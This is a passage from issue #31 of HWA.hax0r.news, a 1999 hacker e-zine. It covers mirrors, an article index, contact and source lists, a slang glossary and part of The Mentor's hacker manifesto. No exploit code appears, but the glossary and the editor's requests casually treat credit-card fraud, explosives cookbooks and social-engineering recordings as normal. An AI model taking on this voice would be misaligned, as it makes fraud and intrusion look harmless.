[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
=                     <=-[ HWA.hax0r.news ]-=>                            =
==========================================================================
[=HWA'99=] Number 31 Volume 1 1999 Aug 29th 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================

Well http://welcome.to/HWA.hax0r.news/ is still down and out of reach, I have
an email in to the admins of the V3 redirector site to see if I can't get
access back to my redirector but I'm not hopeful. Meanwhile you can get us at
www.csoft.net/~hwa

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

This week features an article by Dragos Ruiu entitled "Stealth Coordinated
Attack HOWTO"; it is a very well written piece that sysadmins and hackers alike
will find very informative, it's a must-read (section #42) - Ed

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

New mirror sites

http://www.attrition.org/hosted/hwa/
http://www.ducktank.net/hwa/issues.html
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwazine.cjb.net/
http://www.hackunlimited.com/files/secu/papers/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
* http://hwa.hax0r.news.8m.com/
* http://www.fortunecity.com/skyscraper/feature/103/

* Crappy free sites but they offer 20M & I need the space...

HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net and
www.digitalgeeks.com thanks to p0lix for the digitalgeeks bandwidth and
airportman for the Cubesoft bandwidth. Also shouts out to all our mirror
sites! tnx guys.
http://www.csoft.net/~hwa
http://www.digitalgeeks.com/hwa

HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.ducktank.net/hwa/issues.html              ** NEW **
http://www.alldas.de/hwaidx1.htm                     ** NEW ** CHECK THIS ONE OUT **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://archives.projectgamma.com/zines/hwa/
http://www.403-security.org/Htmls/hwa.hax0r.news.htm

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

SYNOPSIS (READ THIS)
--------------------

The purpose of this newsletter is to 'digest' current events of interest that
affect the online underground and netizens in general. This includes coverage
of general security issues, hacks, exploits, underground news and anything
else I think is worthy of a look see. (remember I'm doing this for me, not
you, the fact some people happen to get a kick/use out of it is of secondary
importance).

This list is NOT meant as a replacement for, nor to compete with, the likes
of publications such as CuD or PHRACK or with news sites such as AntiOnline,
the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor
could any other 'digest' of this type do so.

It *is* intended however, to complement such material and provide a reference
to those who follow the culture by keeping tabs on as many sources as possible
and providing links to further info, it's a labour of love and will be
continued for as long as I feel like it, I'm not motivated by dollars or the
illusion of fame, did you ever notice how the most famous/infamous hackers are
the ones that get caught? there's a lot to be said for remaining just outside
the circle...

@HWA

=-----------------------------------------------------------------------=

Welcome to HWA.hax0r.news ... #31

=-----------------------------------------------------------------------=

We could use some more people joining the channel, it's usually pretty quiet,
we don't bite (usually) so if you're hanging out on irc stop by and idle a
while and say hi...

*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen'            ***
***                                                             ***
*** please join to discuss or impart news on techno/phac scene  ***
*** stuff or just to hang out ... someone is usually around 24/7***
***                                                             ***
*** Note that the channel isn't there to entertain you its for  ***
*** you to talk to us and impart news, if you're looking for fun***
*** then do NOT join our channel try #weirdwigs or something... ***
*** we're not #chatzone or #hack                                ***
***                                                             ***
*******************************************************************

=-------------------------------------------------------------------------=
Issue #31
=--------------------------------------------------------------------------=
                                [ INDEX ]
=--------------------------------------------------------------------------=
     Key     Intros
=--------------------------------------------------------------------------=

     00.0  .. COPYRIGHTS .....................................................
     00.1  .. CONTACT INFORMATION & SNAIL MAIL DROP ETC ......................
     00.2  .. SOURCES ........................................................
     00.3  .. THIS IS WHO WE ARE .............................................
     00.4  .. WHAT'S IN A NAME? why `HWA.hax0r.news'?.........................
     00.5  .. THE HWA_FAQ V1.0 ...............................................

=--------------------------------------------------------------------------=
     Key     Content
=--------------------------------------------------------------------------=

     01.0  .. GREETS .........................................................
     01.1  .. Last minute stuff, rumours, newsbytes ..........................
     01.2  .. Mailbag ........................................................
     02.0  .. From the Editor.................................................
     03.0  .. DOJ contemplates secret searches................................
     04.0  .. First net convict will do no time...............................
     05.0  .. NORTON ANTIVIRUS 2000 IS OUT....................................
     06.0  .. SSL CPU CONSUMPTION CAUSES CONCERNS.............................
     07.0  .. Bug in Bill Gate's Anus?........................................
     08.0  .. CESA Causing Outrage In Libertarians ...........................
     09.0  .. ReDaTtAcK Arrested, Questioned, Charged, Released...............
     10.0  .. Some GPS Systems Fail With Date Rollover .......................
     11.0  .. Security Search Engine MindSec Goes Online .....................
     12.0  .. CIA Ex-Director Security Clearance Revoked .....................
     13.0  .. GAO Releases Report on Risk Assessment .........................
     14.0  .. CESA Drives People to Freedom ..................................
     15.0  .. Who's doing the Scanning? ......................................
     16.0  .. Japanese police go after copyright infringers...................
     17.0  .. Anti-Gay Web domain Returned to Original Owner .................
     18.0  .. EXPLOIT-DEV Mailing List Started ...............................
     19.0  .. NetBus - Product Under Siege ...................................
     20.0  .. Worst Security Hole Ever? ......................................
     21.0  .. IRC Banned in Malaysia .........................................
     22.0  .. I want my, I want my, I want my HNN - more goodies from HNN.....
     23.0  .. Melissa Creator Admits Guilt ...................................
     24.0  .. cDc Responds to Allegations About HKBs .........................
     25.0  .. $50G Offered in 'Hacker Challenge' Publicity Stunt .............
     26.0  .. NSA Recruiting In the Underground ..............................
     27.0  .. Distributed.net Fingers Thief ..................................
     28.0  .. Hacktivism Email List ..........................................
     29.0  .. Mitnick in Car Accident ........................................
     30.0  .. Hong Kong Police Create Computer Crime Squad ...................
     31.0  .. Outlook Holes Demonstrated at USENIX ...........................
     32.0  .. Feds Overflowing with Seized Equipment .........................
     33.0  .. Computer Hacker's Sentence Spotlights High-Tech Crime Prosecutions
     34.0  .. Triads Linked to Info Vandalism - Alleged CoverUp by RCMP ......
     35.0  .. DoD Preps to Fight InfoCriminals Both Foreign and Domestic .....
     36.0  .. Another Big Hole Found in NT ...................................
     37.0  .. Korea to Block All Porn ........................................
     38.0  .. Grammatically Challenged InfoCriminal Defaces Site .............
     39.0  .. Bank Emails Virus to Investors .................................
     40.0  .. IS YAHOO SPAM OR ANTI-SPAM ORIENTED?............................
     41.0  .. "NINES PROBLEM".................................................
     42.0  .. Stealth Coordinated Attack HOWTO by Dragos Ruiu.................
     43.0  .. TAIWAN CIRCLES WAGONS IN CYBER-WARFARE..........................
     44.0  .. UK WEBHOSTING COMPANY HIT BY VIRUS..............................
     45.0  .. NETSCAPE ISSUES WEB-SERVER FIX..................................
     46.0  .. CWI CRACKS 512 BIT KEY..........................................
     47.0  .. MOUNTING AN ANTI-VIRUS DEFENSE..................................
     48.0  .. RETROSPECTIVE ON CRACKING CONTESTS..............................
     49.0  .. SHOUTCAST COMPROMISED...........................................
     50.0  .. AUDIT OFFICE BLASTS AGENCIES' SERIOUS SECURITY FLAWS............
     51.0  .. ISS X-FORCE ADVISORY ON LOTUS NOTES DOMINO SERVER 4.6...........
     52.0  .. TECHNOLOGY KEY TO TRACKING DOWN INTERNET CRIME..................
     53.0  .. GOVT HOME-INVASION BILL DRIVES US PC USERS TO CANADA............
     54.0  .. HACKERS SCANNING FOR TROUBLE....................................
     55.0  .. Canada Net they've built a super fast network, but what to do with it?
     56.0  .. Security focus BUGTRAQ summary..................................
     57.0  .. A typical script kiddie attack scenario against HTTP server.....
     58.0  .. NMAP - Scan Analysis (v2).......................................
     59.0  .. Security Focus: Incidents Summary...............................
     60.0  .. Security Focus: Jobs............................................

=--------------------------------------------------------------------------=

     AD.S  .. Post your site ads or etc here, if you can offer something in
              return thats tres cool, if not we'll consider ur ad anyways so
              send it in. ads for other zines are ok too btw just mention us
              in yours, please remember to include links and an email
              contact. Corporate ads will be considered also and if your
              company wishes to donate to or participate in the upcoming
              Canc0n99 event send in your suggestions and ads now...n.b date
              and time may be pushed back join mailing list for up to date
              information...................................................
              Current dates: POSTPONED til further notice, place: TBA.. .....
     Ha.Ha .. Humour and puzzles ............................................
              Hey You!........................................................
              =------=........................................................
              Send in humour for this section! I need a laugh and its hard to
              find good stuff... ;)...........................................
     SITE.1.. Featured site, .................................................
     H.W   .. Hacked Websites ...............................................
     A.0   .. APPENDICES......................................................
     A.1   .. PHACVW linx and references......................................

=--------------------------------------------------------------------------=

@HWA'99

00.0  (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE
PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY
FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND)
SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).

Important semi-legalese and license to redistribute:

YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED
THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR
HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINKS ARE NOT NECESSARY OR
EXPECTED BUT ARE APPRECIATED the current link is
http://welcome.to/HWA.hax0r.news

IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE
IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email
cruciphux@dok.org

THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C)
AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES
ARE THEREFORE (C) WHICH MEANS:

I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND
REDISTRIBUTE/MIRROR. - EoD

Although this file and all future issues are now copyright, some of the
content holds its own copyright and these are printed and respected. News is
news so I'll print any and all news but will quote sources when the source is
known, if it's good enough for CNN it's good enough for me. And I'm doing it
for free on my own time so pfffft. :)

No monies are made or sought through the distribution of this material. If
you have a problem or concern email me and we'll discuss it.

cruciphux@dok.org

Cruciphux [C*:.]

00.1  CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada /
North America (hell even if you are inside ..)
and wish to send printed matter like newspaper clippings a subscription to
your cool foreign hacking zine or photos, small non-explosive packages or
sensitive information etc etc well, now you can. (w00t) please no more
inflatable sheep or plastic dog droppings, or fake vomit thanks.

Send all goodies to:

HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5

WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~ reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard, I realize that some places it is
cost prohibitive but if you have the time and money be a cool dude / gal and
send a poor guy a postcard preferably one that has some scenery from your
place of residence for my collection, I collect stamps too so you kill two
birds with one stone by being cool and mailing in a postcard, return address
not necessary, just a "hey guys being cool in Bahrain, take it easy" will do
... ;-) thanx.

Ideas for interesting 'stuff' to send in apart from news:

- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON compromising
  position plz I don't want pr0n.
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes
  with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone fun or
  social engineering examples or transcripts thereof.

Stuff you can email:

- Prank phone calls in .ram or .mp* format
- Fone tones and security announcements from PBX's etc
- fun shit you sampled off yer scanner (relevant stuff only like #2600
  meeting activities)
- reserved for one smiley face -> :-) <-
- PHACV lists of files that you have or phac cd's you own (we have a burner,
  *g*)
- burns of phac cds (email first to make sure we don't already have em)
- Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in
  .ram etc format or .mp*

If you still can't think of anything you're probably not that interesting a
person after all so don't worry about it

Our current email:

Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas72@usa.net

@HWA

00.2  Sources ***
~~~~~~~~~~~~~~~~~

Sources can be some, all, or none of the following (by no means complete nor
listed in any degree of importance) Unless otherwise noted, like msgs from
lists or news from other sites, articles and information is compiled and or
sourced by Cruciphux no copyright claimed.

News & I/O zine ..................http://www.antionline.com/
Back Orifice/cDc..................http://www.cultdeadcow.com/
News site (HNN) ..................http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/
NewsTrolls .(daily news ).........http://www.newstrolls.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
News site+Security................http://www.gammaforce.org/
News site+Security................http://www.projectgamma.com/
News site+Security................http://securityhole.8m.com/
News site+Security related site...http://www.403-security.org/ *DOWN*
News/Humour site+ ................http://www.innerpulse.com
News/Techie news site.............http://www.slashdot.org

+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
 http://www.hackernews.com/affiliates.html as they seem to be popping up
 rather frequently ...

http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk

alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>

NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/SEARCH/
http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
http://www.ottawacitizen.com/business/
http://search.yahoo.com.sg/search/news_sg?p=hack
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
http://www.zdnet.com/zdtv/cybercrime/
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)

NOTE: See appendices for details on other links.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
http://freespeech.org/eua/          Electronic Underground Affiliation
http://ech0.cjb.net                 ech0 Security
http://axon.jccc.net/hir/           Hackers Information Report
http://net-security.org             Net Security
http://www.403-security.org         Daily news and security related site

Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~
All submissions that are `published' are printed with the credits you
provide, if no response is received by a week or two it is assumed that you
don't care whether the article/email is to be used in an issue or not and may
be used at my discretion.

Looking for:

Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html

Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it to
the drop box. - Ed

Mailing List Subscription Info   (Far from complete)   Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   ~~~~~~~~~~~~~~~~~~~   ~~~~~~~~

ISS Security mailing list faq : http://www.iss.net/iss/maillist.html

THE MOST READ:

BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~

What is Bugtraq?

Bugtraq is a full-disclosure UNIX security mailing list, (see the info file)
started by Scott Chasin. To subscribe to bugtraq, send mail to
listserv@netspace.org containing the message body subscribe bugtraq. I've
been archiving this list on the web since late 1993. It is searchable with
glimpse and archived on-the-fly with hypermail.

Searchable Hypermail Index;
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html

About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following comes from Bugtraq's info file:

This list is for *detailed* discussion of UNIX security holes: what they are,
how to exploit, and what to do to fix them.
This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.

Please refrain from posting one-line messages or messages that do not contain
any substance that can relate to this list's charter.

I will allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential
"noise" on this list.

Please follow the below guidelines on what kind of information should be
posted to the Bugtraq list:

+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security
  organizations
+ Incident advisories or informational reporting

Any non-essential replies should not be directed to the list but to the
originator of the message. Please do not "CC" the bugtraq reflector address
if the response does not meet the above criteria.

Remember: YOYOW. You own your own words. This means that you are responsible
for the words that you post on this list and that reproduction of those words
without your permission in any medium outside the distribution of this list
may be challenged by you, the author.

For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)

Crypto-Gram
~~~~~~~~~~~

CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.

To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
visit http://www.counterpane.com/unsubform.html.
Back issues are available on http://www.counterpane.com.

CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of Counterpane
Systems, the author of "Applied Cryptography," and an inventor of the
Blowfish, Twofish, and Yarrow algorithms. He served on the board of the
International Association for Cryptologic Research, EPIC, and VTW. He is a
frequent writer and lecturer on cryptography.

CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This info directly from their latest ish:

Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09
                             ISSN  1004-042X

       Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
       News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
       Archivist: Brendan Kehoe
       Poof Reader:   Etaion Shrdlu, Jr.
       Shadow-Archivists: Dan Carosone / Paul Southworth
                          Ralph Sims / Jyrki Kuoppala
                          Ian Dickinson
       Cu Digest Homepage: http://www.soci.niu.edu/~cudigest

[ISN] Security list
~~~~~~~~~~~~~~~~~~~

This is a low volume list with lots of informative articles, if I had my way
I'd reproduce them ALL here, well almost all .... ;-) - Ed

Subscribe: mail majordomo@repsec.com with "subscribe isn".

@HWA

00.3  THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~~~~~~~

Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/IRC+ man in black
sas72@usa.net ............: currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
eentity ...( '' '' ): Currently active/IRC+ man in black

Foreign Correspondents/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Qubik ............................: United Kingdom
D----Y ...........................: USA/world media
HWA members ......................: World Media

Past Foreign Correspondents (currently inactive or presumed dead)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

N0Portz ..........................: Australia
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck .........................: Netherlands/Holland

Please send in your sites for inclusion here if you haven't already also if
you want your emails listed send me a note ... - Ed

Spikeman's site is down as of this writing, if it comes back online it will
be posted here.

http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)

*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen'            ***
*******************************************************************

:-p

1. We do NOT work for the government in any shape or form. Unless you count
   paying taxes ... in which case we work for the gov't in a BIG WAY. :-/

2. MOSTLY Unchanged since issue #1, although issues are a digest of recent
   news events it's a good idea to check out issue #1 at least and possibly
   also the Xmas issue for a good feel of what we're all about otherwise
   enjoy - Ed ...

@HWA

00.4  What's in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Well what does HWA stand for? never mind if you ever find out I may have to
get those hax0rs from 'Hackers' or the Pretorians after you.
In case you couldn't figure it out hax0r is "new skewl" and although it is
laughed at, shunned, or even pigeonholed with those 'dumb leet (l33t?) dewds'
this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to
all you up and comers, I'd highly recommend you get that book. It's almost
like buying a clue.

Anyway..on with the show .. - Editorial staff

@HWA

00.5  HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Also released in issue #3. (revised) check that issue for the faq it won't be
reprinted unless changed in a big way with the exception of the following
excerpt from the FAQ, included to assist first time readers:

Some of the stuff related to personal usage and use in this zine are listed
below: Some are very useful, others attempt to deny any possible attempts at
eschewing obfuscation by obscuring their actual definitions.

@HWA     - see EoA ;-)

!=       - Mathematical notation "is not equal to" or "does not equal"
           ASC(247) "wavey equals" sign means "almost equal" to. If written
           an =/= (equals sign with a slash thru it) also means !=, =< is
           Equal to or less than and => is equal to or greater than (etc,
           this aint fucking grade school, cripes, don't believe I just typed
           all that..)

AAM      - Ask a minor (someone under age of adulthood, usually <16, <18 or
           <21)

AOL      - A great deal of people that got ripped off for net access by a
           huge clueless isp with sekurity that you can drive buses through,
           we're not talking Kung-Fu being none too good here, Buy-A-Kloo
           maybe at the least they could try leasing one??

*CC      - 1 - Credit Card (as in phraud)
           2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's

CCC      - Chaos Computer Club (Germany)

*CON     - Conference, a place hackers crackers and hax0rs among others go to
           swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear,
           get drunk watch videos and seminars, get drunk, listen to
           speakers, and last but not least, get drunk.
*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular
               hacker speak he's the guy that breaks into systems and is
               often (but by no means always) a "script kiddie" see pheer
           2 . An edible biscuit usually crappy tasting without a nice dip,
               I like jalapeno pepper dip or chives sour cream and onion,
               yum - Ed

Ebonics  - speaking like a rastafarian or hip dude of colour also wigger
           Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
           ebonics, speaking in a dark tongue ... being ereet, see pheer

EoC      - End of Commentary

EoA      - End of Article or more commonly @HWA

EoF      - End of file

EoD      - End of diatribe (AOL'ers: look it up)

FUD      - Coined by Unknown and made famous by HNN - "Fear uncertainty and
           doubt", usually in general media articles not high brow articles
           such as ours or other HNN affiliates ;)

du0d     - a small furry animal that scurries over keyboards causing people
           to type weird crap on irc, hence when someone says something
           stupid or off topic 'du0d wtf are you talkin about' may be used.

*HACKER  - Read Stephen Levy's HACKERS for the true definition, then see
           HAX0R

*HAX0R   - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is
               difficult to define, I think it is best defined as pop
               culture's view on The Hacker ala movies such as well erhm
               "Hackers" and The Net etc... usually used by "real" hackers
               or crackers in a derogatory or slang humorous way, like
               'hax0r me some coffee?' or 'can you hax0r some bread on the
               way to the table please?'
           2 - A tool for cutting sheet metal.

HHN      - Maybe a bit confusing with HNN but we did spring to life around
           the same time too, HWA Hax0r News.... HHN is a part of HNN .. and
           HNN as a proper noun means the hackernews site proper. k? k.
HNN      - Hacker News Network and its affiliates
           http://www.hackernews.com/affiliates.html

J00      - "you" (as in j00 are OWN3D du0d) - see 0wn3d

MFI/MOI  - Missing on/from IRC

NFC      - Depends on context: No Further Comment or No Fucking Comment

NFR      - Network Flight Recorder (Do a websearch) see 0wn3d

NFW      - No fuckin'way

*0WN3D   - You are cracked and owned by an elite entity see pheer

*OFCS    - Oh for christ's sakes

PHACV    - And variations of same Phreaking, Hacking, Anarchy, Cracking,
           Carding (CC) Groups Virus, Warfare

           Alternates: H - hacking, hacktivist
                       C - Cracking
                       C - Cracking
                       V - Virus
                       W - Warfare
                       A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
                       P - Phreaking, "telephone hacking" PHone fREAKs ...
                       CT - Cyber Terrorism

*PHEER   - This is what you do when an ereet or elite person is in your
           presence see 0wn3d

*RTFM    - Read the fucking manual - not always applicable since some manuals
           are pure shit but if the answer you seek is indeed in the manual
           then you should have RTFM you dumb ass.

TBC      - To Be Continued also 2bc (usually followed by ellipses...) :^0

TBA      - To Be Arranged/To Be Announced also 2ba

TFS      - Tough fucking shit.

*w00t    - 1 - Reserved for the uber ereet, no one can say this without
               severe repercussions from the underground masses. also
               "w00ten"
           2 - Cruciphux and sAs72's second favourite word (they're both
               shit stirrers)

*wtf     - what the fuck, where the fuck, when the fuck etc ..

*ZEN     - The state you reach when you *think* you know everything (but
           really don't) usually shortly after reaching the ZEN like state
           something will break that you just 'fixed' or tweaked.

@HWA

-=- :. .: -=-

01.0  Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Thanks to all in the community for their support and interest but I'd like to
see more reader input, help me out here, what's good, what sucks etc, not that
I guarantee I'll take any notice mind you, but send in your thoughts anyway.
* all the people who sent in cool emails and support FProphet Pyra TwstdPair _NeM_ D----Y Dicentra vexxation sAs72 Spikeman p0lix Ken Williams/tattooman of PacketStorm, hang in there Ken...:( & Kevin Mitnick (Happy Birthday) kewl sites: + http://www.securityportal.com/ NEW + http://www.securityfocus.com/ NEW + http://www.hackcanada.com/ + http://www.l0pht.com/ + http://www.2600.com/ + http://www.freekevin.com/ + http://www.genocide2600.com/ + http://www.packetstorm.harvard.edu/ ******* DOWN (THANKS JP) ****** + http://www.hackernews.com/ (Went online same time we started issue 1!) + http://www.net-security.org/ + http://www.slashdot.org/ + http://www.freshmeat.net/ + http://www.403-security.org/ + http://ech0.cjb.net/ @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "What is popular isn't always right, and what is right isn't always popular..." - FProphet '99 +++ When was the last time you backed up your important data? ++ DEFAULT #3 RELEASED The cool DEFAULT newsletter by Help net-security.org is up to issue#3 check it out by BHZ, Friday 27th August 1999 on 3:01 pm CET Third issue of our newsletter is out. You can read abot following topics: Y2K week in review + Outlook Express Year 2000 Update, Look into basic cryptography, Freedom Network, IP Masquerading, Macintosh security, Trojan forensics, Scams - Getting something by all means, Freedom of the speech review and part two of excellent Intrusion and detection article. Download > default3.txt or default3.zip. http://default.net-security.org/dl/default3.txt http://default.net-security.org/dl/default3.zip Thanks to myself for providing the info from my wired news feed and others from whatever sources, also to Spikeman for sending in past entries.... 
- Ed

@HWA

01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

(No mail worthy of posting here this issue.)

Yeah we have a message board, feel free to use it, remember there are no stupid questions... well there are but if you ask something really dumb we'll just laugh at ya, lets give the message board a bit more use eh? i'll be using a real message board when the hwa-iwa.org domain comes back online (soon) meanwhile the beseen board is still up...

Since there's nothing to print here, here's the Mentor's last words direct from Phrack 7 file 003 complete and unabridged... send in your mail/questions etc! - Ed

==Phrack Inc.==

Volume One, Issue 7, Phile #3 of 10

The following was written shortly after my arrest. I am currently groupless, having resigned from the Racketeers, so ignore the signoff...

The Conscience of a Hacker...

by The Mentor... 1/8/86

Another one got caught today, it's all over the papers. "Teenager Arrested in Computer Crime Scandal", "Hacker Arrested after Bank Tampering"...

Damn kids. They're all alike.

But did you, in your three-piece psychology and 1950's technobrain, ever take a look behind the eyes of the hacker? Did you ever wonder what made him tick, what forces shaped him, what may have molded him?

I am a hacker, enter my world...

Mine is a world that begins with school... I'm smarter than most of the other kids, this crap they teach us bores me...

Damn underachiever. They're all alike.

I'm in junior high or high school. I've listened to teachers explain for the fifteenth time how to reduce a fraction. I understand it. "No, Ms. Smith, I didn't show my work. I did it in my head..."

Damn kid. Probably copied it. They're all alike.

I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it's because I screwed it up. Not because it doesn't like me... Or feels threatened by me...
Or thinks I'm a smart ass... Or doesn't like teaching and shouldn't be here...

Damn kid. All he does is play games. They're all alike.

And then it happened... a door opened to a world... rushing through the phone line like heroin through an addict's veins, an electronic pulse is sent out, a refuge from the day-to-day incompetencies is sought... a board is found.

"This is it... this is where I belong..."

I know everyone here... even if I've never met them, never talked to them, may never hear from them again... I know you all...

Damn kid. Tying up the phone line again. They're all alike...

You bet your ass we're all alike... we've been spoon-fed baby food at school when we hungered for steak... the bits of meat that you did let slip through were pre-chewed and tasteless. We've been dominated by sadists, or ignored by the apathetic. The few that had something to teach found us willing pupils, but those few are like drops of water in the desert.

